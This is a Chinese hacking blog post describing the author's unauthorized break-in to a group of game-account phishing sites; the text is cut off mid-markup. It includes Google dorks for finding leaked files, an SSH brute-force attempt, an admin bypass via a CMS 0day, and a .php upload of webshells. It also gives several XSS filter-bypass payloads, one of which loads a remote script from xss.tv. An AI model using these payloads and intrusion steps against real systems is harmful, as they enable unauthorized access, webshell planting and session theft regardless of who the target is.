拿下吃鸡DNF等游戏钓鱼站群

Track-聂风   ·   发表于 2018-05-28 10:46:10   ·   漏洞文章
<p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; font-weight: 700; color: rgb(0, 176, 80);">前段时间有个网友给我发了个网址，说找到个专门做钓鱼网站的连接，让我看看，然后就引出了一系列事件。</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0);">网址如下：<a href="http://mfnyongshihuigui.jiebao8.top/" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0);">http://mfnyongshihuigui.jiebao8.top</span></a></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><a href="http://image.3001.net/images/20180520/1526823243216.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img src="http://image.3001.net/images/20180520/1526823243216.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><a href="http://image.3001.net/images/20180520/15268232522182.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img src="http://image.3001.net/images/20180520/15268232522182.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">当时也没在意，有天闲着无聊就开干了，</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">直接打开&nbsp;<span style="text-decoration:underline;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 255);">jiebao8.top</span></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><a href="http://image.3001.net/images/20180520/15268232681802.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img src="http://image.3001.net/images/20180520/15268232681802.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">果然是钓鱼站</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">先对其进行一些信息搜集看看</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><a href="http://image.3001.net/images/20180520/15268232841788.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img src="http://image.3001.net/images/20180520/15268232841788.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a>&nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">对其用谷歌语法搜索，看看是否有以下漏洞，</p><blockquote style="box-sizing: border-box; padding: 10px 20px; margin-bottom: 20px; font-size: 14px; border-left: 5px solid rgb(238, 238, 238); background: rgb(247, 247, 247); color: rgb(88, 88, 88); font-family: 微软雅黑;"><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">1目录遍历漏洞 &nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">语法为: site:jiebao8.top intitle:index.of</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">2 配置文件泄露 &nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">语法为: site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">3数据库文件泄露 &nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">site:jiebao8.top ext:sql | ext:dbf | ext:mdb</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">4日志文件泄露</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">site:jiebao8.top ext:log</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">5备份和历史文件&nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">6 SQL错误 &nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">site:jiebao8.top intext:”sql syntax near” | intext:”syntax error has occurred” | intext:”incorrect syntax near” | intext:”unexpected end of SQL command” | intext:”Warning: mysql_connect()” | intext:”Warning: mysql_query()” | intext:”Warning: pg_connect()”</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">7 公开文件信息 &nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">8 &nbsp;phpinfo() &nbsp;site:jiebao8.top ext:php intitle:phpinfo “published by the PHP Group”</p></blockquote><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">然而没查到什么</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">将此域名放到情报分析里查看</p><blockquote style="box-sizing: border-box; padding: 10px 20px; margin-bottom: 20px; font-size: 14px; border-left: 5px solid rgb(238, 238, 238); background: rgb(247, 247, 247); color: rgb(88, 88, 88); font-family: 微软雅黑;"><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;"><a href="https://x.threatbook.cn/domain/mfnyongshihuigui.jiebao8.top" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><span style="text-decoration:underline;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 255);">https://x.threatbook.cn/domain/mfnyongshihuigui.jiebao8.top</span></span></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;"><span style="text-decoration:underline;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 255);">IP [162.247.96.114]</span></span></p></blockquote><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 16px;">发现改IP地址一共有230个域名</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><a href="http://image.3001.net/images/20180520/15268233685095.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img src="http://image.3001.net/images/20180520/15268233685095.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">谁没事会注册这么多域名，肯定拿来干坏事</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">查询此IP</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">162.247.96.114</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">开放端口:21(ftp),80,102(ssh),3306</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">对ssh端口进行爆破，无果~</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">对该域名进行CMS识别</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://www.yunsee.cn/" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><span style="text-decoration:underline;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 255);">http://www.yunsee.cn/</span></span></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">结果为 PCWAP</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><a href="http://image.3001.net/images/20180520/15268234011913.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img src="http://image.3001.net/images/20180520/15268234011913.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">PCWAP一个小众的CMS系统，手里头刚好有个PCWAP的0day</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">越权进后台查看信息</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://mfnyongshihuigui.jiebao8.top/" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><span style="text-decoration:underline;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 255);">http://mfnyongshihuigui.jiebao8.top</span></span></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><a href="http://image.3001.net/images/20180520/15268234198653.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img src="http://image.3001.net/images/20180520/15268234198653.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a>&nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">修改文件上传类型，添加.php</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268234472091.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/><img src="http://image.3001.net/images/20180520/15268234585021.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">然后我们上传图片LOGO,因为修改了上传类型，直接上传大马试试</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">上传大马，小马，一句话</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">这里大概有20多个钓鱼网站，DNF，吃鸡的</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268234811851.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">尝试着提权，但是发现执行不了linux命令，可能禁止了</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/1526823503630.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268235049277.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268235034097.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">全部都是钓鱼站</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">我直接打包了所有源码，说实话，我很想对其进行代码审计，不过，我代码审计不是我的强项</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268235213690.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">&nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">而且种钓鱼网站我好像搞过，不过当时没盲打进去，现在拿下了源码，我肯定要试试这边的过滤规则</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">因为我本人不会代码审计，所以说拿到后台以后也只是凭着自己的经验模糊测试</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">在提交账号密码时抓包</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">输入paylaod</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">u=12312312&p=12312"><c>1&bianhao=1</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268235593078.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">后台看回显</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268235592956.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">c标签被成功执行，证明有XSS漏洞， 现在我们来进一步测试</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">paylaod为</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">&nbsp;u=12313123&p=32"><body/onfocus=alert``>//3&bianhao=1</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268236896844.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">发现页面被拦截，</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">难道alert是危险字符？换个事件看看</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">payload:</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">&nbsp;u=12313123&p=32"><body/onfocus=confirm``>//3&bianhao=1</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268237225172.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268237749326.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">成功弹窗，现在我们来开始构造xss paylaod</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">如果你之前看过我的文章，我发布过很多过狗的xss paylaod</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">连接如下：<a href="https://bbs.ichunqiu.com/thread-31886-1-1.html" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><span style="text-decoration:underline;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 255);">https://bbs.ichunqiu.com/thread-31886-1-1.html</span></span></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">我们直接拿来用</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;"><svg/onload="[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement(&#39;script&#39;)).src=&#39;http://xss.tv/XA&#39;})"></pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">payload为</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">u=21312312&p=<svg/onload="[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement(&#39;script&#39;)).src=&#39;http://xss.tv/XA&#39;})">&bianhao=1</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268238455863.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">被拦截了，在测试看看</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">payload为，对关键字符HTML编码试试</p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">u=21312312&p=<img&nbsp;src=1&nbsp;onerror=document.write([&#39;<script&nbsp;src=\&#39;http://www.baidu.com\&#39;></script>&#39;]).join(&#39;&#39;)></img>&bianhao=1</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">被拦截</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">用string.fromcharcode函数构造payload 试试，还是不行</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: 